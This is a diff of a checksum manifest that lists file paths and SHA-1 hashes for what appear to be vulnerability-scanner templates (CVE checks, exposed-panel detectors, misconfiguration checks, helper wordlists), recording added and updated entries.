dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253
|
||||||
dast/vulnerabilities/xss/reflected-xss.yaml:cbb257b78545acfdb058780827b255ca8ac6099c
|
dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f
|
||||||
dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a
|
dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a
|
||||||
dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a
|
dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a
|
||||||
dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0
|
dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0
|
||||||
|
@ -614,11 +615,12 @@ helpers/payloads/swagger-payload:6e0a08fc7310a1ce07226a012520ba1f73029945
|
||||||
helpers/payloads/wp-social-warfare-rce.txt:6b93ad84c3035c6779d75057e645171476cbc530
|
helpers/payloads/wp-social-warfare-rce.txt:6b93ad84c3035c6779d75057e645171476cbc530
|
||||||
helpers/wordlists/adminer-paths.txt:2ac24141ad5f28203b9ca35719bd51f39381aa36
|
helpers/wordlists/adminer-paths.txt:2ac24141ad5f28203b9ca35719bd51f39381aa36
|
||||||
helpers/wordlists/grafana-plugins.txt:0621c38f856c64ac8c96e53b96bc90881fe35704
|
helpers/wordlists/grafana-plugins.txt:0621c38f856c64ac8c96e53b96bc90881fe35704
|
||||||
helpers/wordlists/headers.txt:2effcf74fe0332b242c98df1f50f774c556746d6
|
helpers/wordlists/headers.txt:1d92a664669f50906e4ad90d299f78cbeb6f8687
|
||||||
helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a
|
helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a
|
||||||
helpers/wordlists/mysql-passwords.txt:39cb7f9500b441097c09510fbf93b7c123cd77e9
|
helpers/wordlists/mysql-passwords.txt:39cb7f9500b441097c09510fbf93b7c123cd77e9
|
||||||
helpers/wordlists/mysql-users.txt:d46fe9fd35f6b8d4de6901572e04bcc0845e8332
|
helpers/wordlists/mysql-users.txt:d46fe9fd35f6b8d4de6901572e04bcc0845e8332
|
||||||
helpers/wordlists/numbers.txt:8084f0f10255c5e26605a1cb1f51c5e53f92df40
|
helpers/wordlists/numbers.txt:8084f0f10255c5e26605a1cb1f51c5e53f92df40
|
||||||
|
helpers/wordlists/params.txt:503c5527904f6c8846d31f87b1ac565c61d7c6c6
|
||||||
helpers/wordlists/prestashop-modules.txt:ae73ac19d088b28a943e8a9ce98ab4461e4dc029
|
helpers/wordlists/prestashop-modules.txt:ae73ac19d088b28a943e8a9ce98ab4461e4dc029
|
||||||
helpers/wordlists/shiro_encrypted_keys.txt:3a072e8246dabee62eecfd62edef1b3977165f34
|
helpers/wordlists/shiro_encrypted_keys.txt:3a072e8246dabee62eecfd62edef1b3977165f34
|
||||||
helpers/wordlists/ssh-passwords.txt:04aaf532580a605e8356df448196ac06939ad544
|
helpers/wordlists/ssh-passwords.txt:04aaf532580a605e8356df448196ac06939ad544
|
||||||
|
@ -1927,7 +1929,7 @@ http/cves/2020/CVE-2020-7796.yaml:6157549eb38e8fc6de1a599af340892651ab2a72
|
||||||
http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2
|
http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2
|
||||||
http/cves/2020/CVE-2020-7961.yaml:6e6a2d87ac59b710e9f06ac8468de57cd0695f9a
|
http/cves/2020/CVE-2020-7961.yaml:6e6a2d87ac59b710e9f06ac8468de57cd0695f9a
|
||||||
http/cves/2020/CVE-2020-7980.yaml:1b8c02806c66311834a931181b6acb7fada2bc9d
|
http/cves/2020/CVE-2020-7980.yaml:1b8c02806c66311834a931181b6acb7fada2bc9d
|
||||||
http/cves/2020/CVE-2020-8115.yaml:68173d36e231cef7317d8a24655cde2134bf2052
|
http/cves/2020/CVE-2020-8115.yaml:6f19a8294b923f314ce8b28098bd70e55a123858
|
||||||
http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5
|
http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5
|
||||||
http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915
|
http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915
|
||||||
http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6
|
http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6
|
||||||
|
@ -2365,6 +2367,7 @@ http/cves/2021/CVE-2021-43734.yaml:ba2e81ae59684a8bcfde140cc091cb3a77e3f427
|
||||||
http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9
|
http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9
|
||||||
http/cves/2021/CVE-2021-43798.yaml:6afb9139e24bf0c40b9e5a0c12e49f83793920c2
|
http/cves/2021/CVE-2021-43798.yaml:6afb9139e24bf0c40b9e5a0c12e49f83793920c2
|
||||||
http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f
|
http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f
|
||||||
|
http/cves/2021/CVE-2021-43831.yaml:89f39234d1633cece6948896980a84ad95fafcb4
|
||||||
http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d
|
http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d
|
||||||
http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732
|
http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732
|
||||||
http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e
|
http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e
|
||||||
|
@ -3040,6 +3043,7 @@ http/cves/2023/CVE-2023-31059.yaml:ce8e595c554e7f91bb6e4ed339d987e571ffb947
|
||||||
http/cves/2023/CVE-2023-31446.yaml:5accf9db37b634e8c8bcc2cd58586c8e0df71827
|
http/cves/2023/CVE-2023-31446.yaml:5accf9db37b634e8c8bcc2cd58586c8e0df71827
|
||||||
http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019
|
http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019
|
||||||
http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d
|
http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d
|
||||||
|
http/cves/2023/CVE-2023-32068.yaml:41b3c520f9803190b0bff32818680581cbea97fe
|
||||||
http/cves/2023/CVE-2023-32077.yaml:4fd13fb1ff9440e463e7d615d2f1ba70395821b9
|
http/cves/2023/CVE-2023-32077.yaml:4fd13fb1ff9440e463e7d615d2f1ba70395821b9
|
||||||
http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b
|
http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b
|
||||||
http/cves/2023/CVE-2023-3219.yaml:245f94f5a5a80ebd7cd5912e7849ad425cfcc8cb
|
http/cves/2023/CVE-2023-3219.yaml:245f94f5a5a80ebd7cd5912e7849ad425cfcc8cb
|
||||||
|
@ -3216,6 +3220,7 @@ http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f
|
||||||
http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f
|
http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f
|
||||||
http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba
|
http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba
|
||||||
http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62
|
http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62
|
||||||
|
http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a
|
||||||
http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d
|
http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d
|
||||||
http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8
|
http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8
|
||||||
http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d
|
http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d
|
||||||
|
@ -3272,6 +3277,7 @@ http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f
|
||||||
http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab
|
http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab
|
||||||
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
|
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
|
||||||
http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a
|
http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a
|
||||||
|
http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46
|
||||||
http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2
|
http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2
|
||||||
http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411
|
http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411
|
||||||
http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b
|
http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b
|
||||||
|
@ -3292,6 +3298,7 @@ http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c
|
||||||
http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05
|
http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05
|
||||||
http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23
|
http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23
|
||||||
http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3
|
http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3
|
||||||
|
http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301
|
||||||
http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8
|
http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8
|
||||||
http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f
|
http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f
|
||||||
http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
|
http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
|
||||||
|
@ -3304,26 +3311,31 @@ http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8
|
||||||
http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1
|
http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1
|
||||||
http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
|
http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
|
||||||
http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43
|
http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43
|
||||||
|
http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225
|
||||||
http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca
|
http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca
|
||||||
http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100
|
http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100
|
||||||
http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9
|
http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9
|
||||||
http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2
|
http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2
|
||||||
http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae
|
http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae
|
||||||
|
http/cves/2024/CVE-2024-31750.yaml:79b602d5b722a6a716b628652d2dd2955b50e4a1
|
||||||
http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c
|
http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c
|
||||||
http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe
|
http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe
|
||||||
http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca
|
http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca
|
||||||
http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690
|
http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690
|
||||||
|
http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56
|
||||||
http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5
|
http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5
|
||||||
http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74
|
http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74
|
||||||
http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c
|
http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c
|
||||||
http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00
|
http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00
|
||||||
|
http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c
|
||||||
http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab
|
http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab
|
||||||
http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962
|
http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962
|
||||||
http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc
|
http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc
|
||||||
http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2
|
http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2
|
||||||
http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8
|
http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8
|
||||||
http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654
|
http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654
|
||||||
http/cves/2024/CVE-2024-37393.yaml:20d877ad8786073ac602c19cd95eacb4f8d73436
|
http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189
|
||||||
|
http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd
|
||||||
http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c
|
http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c
|
||||||
http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310
|
http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310
|
||||||
http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181
|
http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181
|
||||||
|
@ -3956,9 +3968,9 @@ http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a76
|
||||||
http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e
|
http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e
|
||||||
http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e0064ab21
|
http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e0064ab21
|
||||||
http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9
|
http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9
|
||||||
http/exposed-panels/ibm/ibm-note-login.yaml:66155682019a6922f6b68bc4125a86812de71879
|
http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd
|
||||||
http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23
|
http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23
|
||||||
http/exposed-panels/ibm/ibm-security-access-manager.yaml:83faa8d7636cd912e030c69615cf5e6fa59e871c
|
http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8
|
||||||
http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4
|
http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4
|
||||||
http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06
|
http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06
|
||||||
http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438
|
http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438
|
||||||
|
@ -4503,6 +4515,7 @@ http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360e
|
||||||
http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da
|
http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da
|
||||||
http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943
|
http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943
|
||||||
http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060
|
http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060
|
||||||
|
http/exposed-panels/turnkey-lamp-panel.yaml:8ec785a66d2050a19b465630ee89555e0d90798a
|
||||||
http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b
|
http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b
|
||||||
http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767
|
http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767
|
||||||
http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996
|
http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996
|
||||||
|
@ -5288,7 +5301,7 @@ http/misconfiguration/apache/apache-couchdb-unauth.yaml:f1a42febc03d40ab2eb27519
|
||||||
http/misconfiguration/apache/apache-filename-enum.yaml:00fec57e8abf4422bb9223a4f1ce706b023f0eef
|
http/misconfiguration/apache/apache-filename-enum.yaml:00fec57e8abf4422bb9223a4f1ce706b023f0eef
|
||||||
http/misconfiguration/apache/apache-hbase-unauth.yaml:73f22979593c54310c2145d482018010663fe9a2
|
http/misconfiguration/apache/apache-hbase-unauth.yaml:73f22979593c54310c2145d482018010663fe9a2
|
||||||
http/misconfiguration/apache/apache-nifi-unauth.yaml:4e19b0b31aea4665b8ca4fa4c2aa6380182ce120
|
http/misconfiguration/apache/apache-nifi-unauth.yaml:4e19b0b31aea4665b8ca4fa4c2aa6380182ce120
|
||||||
http/misconfiguration/apache/apache-server-status-localhost.yaml:66cb8088785ba5ec211abc13b82eeef13a4a1213
|
http/misconfiguration/apache/apache-server-status-localhost.yaml:ed27964d3819446bb04a4095a3edf2ae58872cba
|
||||||
http/misconfiguration/apache/apache-server-status.yaml:1afd6683f4ff99098d2c8a81ea650f1be4a81926
|
http/misconfiguration/apache/apache-server-status.yaml:1afd6683f4ff99098d2c8a81ea650f1be4a81926
|
||||||
http/misconfiguration/apache/apache-storm-unauth.yaml:a4e0f588e65474220083ff0960511fc324b4f139
|
http/misconfiguration/apache/apache-storm-unauth.yaml:a4e0f588e65474220083ff0960511fc324b4f139
|
||||||
http/misconfiguration/apache/apache-zeppelin-unauth.yaml:18859a2711b1796228e38d53e2588c4a211e33d4
|
http/misconfiguration/apache/apache-zeppelin-unauth.yaml:18859a2711b1796228e38d53e2588c4a211e33d4
|
||||||
|
@ -5306,7 +5319,7 @@ http/misconfiguration/artifactory-anonymous-deploy.yaml:49628b203377dc7a16449154
|
||||||
http/misconfiguration/aspx-debug-mode.yaml:338648e96f3123018a8373d5b3bfe61c5c201bb1
|
http/misconfiguration/aspx-debug-mode.yaml:338648e96f3123018a8373d5b3bfe61c5c201bb1
|
||||||
http/misconfiguration/atlassian-bamboo-build.yaml:65a75813eec4e3918e5efcc46669bebe3b4310ba
|
http/misconfiguration/atlassian-bamboo-build.yaml:65a75813eec4e3918e5efcc46669bebe3b4310ba
|
||||||
http/misconfiguration/aws/aws-ec2-status.yaml:676383b1e7312422e3a7359ae0ede6e5500ec9ea
|
http/misconfiguration/aws/aws-ec2-status.yaml:676383b1e7312422e3a7359ae0ede6e5500ec9ea
|
||||||
http/misconfiguration/aws/aws-object-listing.yaml:4b9e4b852563898d23697d06b8a6d057c5ce8dae
|
http/misconfiguration/aws/aws-object-listing.yaml:7c4d6662bbadf6585a95adbbfee865113a08888d
|
||||||
http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d110504106276
|
http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d110504106276
|
||||||
http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55
|
http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55
|
||||||
http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1
|
http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1
|
||||||
|
@ -5335,7 +5348,8 @@ http/misconfiguration/collectd-exporter-metrics.yaml:c47a1526e0297b0f553cbd12b0f
|
||||||
http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d87627905c86a
|
http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d87627905c86a
|
||||||
http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b
|
http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b
|
||||||
http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0
|
http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0
|
||||||
http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51
|
http/misconfiguration/cookies-without-httponly.yaml:b7d3567792f6d1da6385c3c2393db6e65216cdf8
|
||||||
|
http/misconfiguration/cookies-without-secure.yaml:624a1b5f88d0aff132d199eeffca11595bead000
|
||||||
http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b
|
http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b
|
||||||
http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b
|
http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b
|
||||||
http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce
|
http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce
|
||||||
|
@ -6828,7 +6842,7 @@ http/technologies/google/cloud-run-default-page.yaml:91ff90b29a400729fd8dbef4aaf
|
||||||
http/technologies/google/firebase-detect.yaml:fa2021156b4a3de1e257f610042c076d83ecab21
|
http/technologies/google/firebase-detect.yaml:fa2021156b4a3de1e257f610042c076d83ecab21
|
||||||
http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827baa9
|
http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827baa9
|
||||||
http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d
|
http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d
|
||||||
http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333
|
http/technologies/google/google-storage.yaml:6f4b77b2ce984d502f781974800f1940805db18c
|
||||||
http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb
|
http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb
|
||||||
http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0
|
http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0
|
||||||
http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29
|
http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29
|
||||||
|
@ -7645,6 +7659,8 @@ http/vulnerabilities/gitlab/gitlab-rce.yaml:173dd50897b2956f85fce08f9730f740415e
|
||||||
http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad
|
http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad
|
||||||
